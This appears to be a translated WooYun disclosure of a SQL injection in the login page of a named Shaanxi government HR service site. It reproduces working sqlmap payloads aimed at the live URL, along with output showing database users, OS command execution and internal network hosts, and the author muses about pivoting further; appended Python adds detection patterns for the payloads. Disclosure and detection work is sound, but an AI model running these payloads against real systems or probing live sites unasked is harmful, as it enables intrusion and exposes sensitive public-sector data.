Vulnerability summary

Defect ID: wooyun-2014-053001

Title: POST injection on the login page of the Shaanxi Human Resources Service Agency Management System

Affected vendor: 陕西人才公共服务网 (Shaanxi Talent Public Service Network)

Author: Neeke

Submitted: 2014-03-07 13:38

Fix deadline: 2014-04-21 13:38

Published: 2014-04-21 13:38

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2014-03-07: details sent to the vendor, awaiting vendor action
2014-03-12: vendor confirmed; details visible to the vendor only
2014-03-22: details opened to core white hats and domain experts
2014-04-01: details opened to regular white hats
2014-04-11: details opened to trainee white hats
2014-04-21: details opened to the public

Brief description:

A colleague was preparing to transfer his household registration and sent me this 陕西人才公共服务网 site, where you can look up a person's registered residence and similar information. I gave it a quick try while I was at it.

Detailed description:

http://hrm.snhr.gov.cn/login.asp
POST parameters: cname=a&pwd=a&kind=a

Proof of vulnerability:

[Two screenshots attached to the original report: Screenshot from 2014-03-07 09:15:50.png and Screenshot from 2014-03-07 09:16:01.png]

sqlmap identified the following injection points with a total of 54 HTTP(s) requests:
---
Place: POST
Parameter: cname
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: cname=a' AND 7930=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(121)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7930=7930) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(109)+CHAR(114)+CHAR(113))) AND 'DUqc'='DUqc&pwd=a&kind=a
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: cname=a' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(121)+CHAR(118)+CHAR(113)+CHAR(115)+CHAR(108)+CHAR(90)+CHAR(89)+CHAR(100)+CHAR(100)+CHAR(80)+CHAR(112)+CHAR(100)+CHAR(88)+CHAR(113)+CHAR(105)+CHAR(109)+CHAR(114)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &pwd=a&kind=a
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: cname=a'; WAITFOR DELAY '0:0:5'--&pwd=a&kind=a
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: cname=a' WAITFOR DELAY '0:0:5'--&pwd=a&kind=a
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
database management system users [3]:
[*] sa
[*] yxgc
[*] zjgl
available databases [9]:
[*] $zjgl
[*] ccts
[*] master
[*] model
[*] msdb
[*] StuRegister
[*] tempdb
[*] yxgc
[*] zjgl2
database management system users password hashes:
command standard output:
---
Windows IP Configuration
Host Name . . . . . . . . . . . . : ibm
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) 82575EB Gigabit Network Connection #2
Physical Address. . . . . . . . . : 5C-F3-FC-A7-CC-62
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 192.168.33.5
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.33.1
DNS Servers . . . . . . . . . . . : 218.30.19.40
61.134.1.4
---
command standard output:
---
服务器名称 注释

-------------------------------------------------------------------------------
\\2011-20131030JB
\\5KUK7HRFDXWVQAE
\\IBM
\\LENOVO-125BF0D0
\\PC-20130129EYBO
\\RC-7FE068CAE8FC
\\RCSC-TP53Z8UEUW
\\SNHR-DANGWEI
\\SUH-104FE84B032
\\XP-201206261032
---
Further privilege escalation and an intranet pivot should be possible from here, I'd think? I stopped at this point and went no further.
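
As an added defender-side example that is not part of the original report, the Python below classifies captured login.asp POST bodies against the four payload families sqlmap reported above (MSSQL error-based CONVERT, CHAR() concatenation, UNION SELECT, WAITFOR DELAY), so a WAF or log pipeline can alert on them rather than wait for the 54-request burst to finish. The source IPs and bodies are constructed samples shortened from the report's payloads, and the (ip, body) tuple format is an assumption about what the log collector provides.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed samples (source IP, POST body) modelled on the login.asp request in
# the report; bodies are shown percent-decoded, the way sqlmap prints its payloads.
SAMPLE_REQUESTS = [
    ("10.0.0.7", "cname=zhang&pwd=Secret1&kind=1"),
    ("10.0.0.9", "cname=a' AND 7930=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(121)"
                 "+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7930=7930) THEN CHAR(49) ELSE "
                 "CHAR(48) END))+CHAR(113))) AND 'DUqc'='DUqc&pwd=a&kind=a"),
    ("10.0.0.9", "cname=a'; WAITFOR DELAY '0:0:5'--&pwd=a&kind=a"),
    ("10.0.0.9", "cname=a' UNION ALL SELECT CHAR(113)+CHAR(120),NULL,NULL,NULL,NULL,"
                 "NULL,NULL,NULL-- &pwd=a&kind=a"),
    ("10.0.0.3", "cname=o'brien&pwd=x&kind=2"),   # legitimate apostrophe, must not flag
]

# One signature per technique sqlmap reported against this endpoint (MSSQL dialect).
SIGNATURES = {
    "mssql_error_based": re.compile(r"CONVERT\s*\(\s*INT\s*,\s*\(\s*SELECT\b", re.I),
    "char_concat":       re.compile(r"(?:CHAR\(\d{1,3}\)\s*\+\s*){3,}", re.I),
    "union_select":      re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "waitfor_delay":     re.compile(r"\bWAITFOR\s+DELAY\s+'", re.I),
    "comment_tail":      re.compile(r"--\s*$"),
}

def parse_body(body):
    """Split a form body on '&' only (never ';', which sits inside stacked-query
    payloads such as a'; WAITFOR ...) and percent-decode each name and value."""
    fields = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        fields[unquote(name)] = unquote(value)
    return fields

def classify(body):
    """Return {parameter: [matched signature names]} for every suspicious field;
    an empty dict means the body looks like an ordinary login attempt."""
    hits = {}
    for name, value in parse_body(body).items():
        matched = [sig for sig, rx in SIGNATURES.items() if rx.search(value)]
        if matched:
            hits[name] = matched
    return hits

def flagged_by_source(requests):
    """Count flagged requests per source IP; repeated hits from one address
    against the login form are the condition worth alerting on."""
    return Counter(ip for ip, body in requests if classify(body))
```

Running `flagged_by_source(SAMPLE_REQUESTS)` attributes all three injection bodies to 10.0.0.9 while the two genuine logins, including the one containing an apostrophe, produce no hits.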

Fix recommendation:

Believe in yourself!

Copyright notice: please credit the source when republishing: Neeke@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2014-03-12 14:43

Vendor reply:

Transferred via CNCERT to the Shaanxi branch centre for handling.

Latest status:

None yet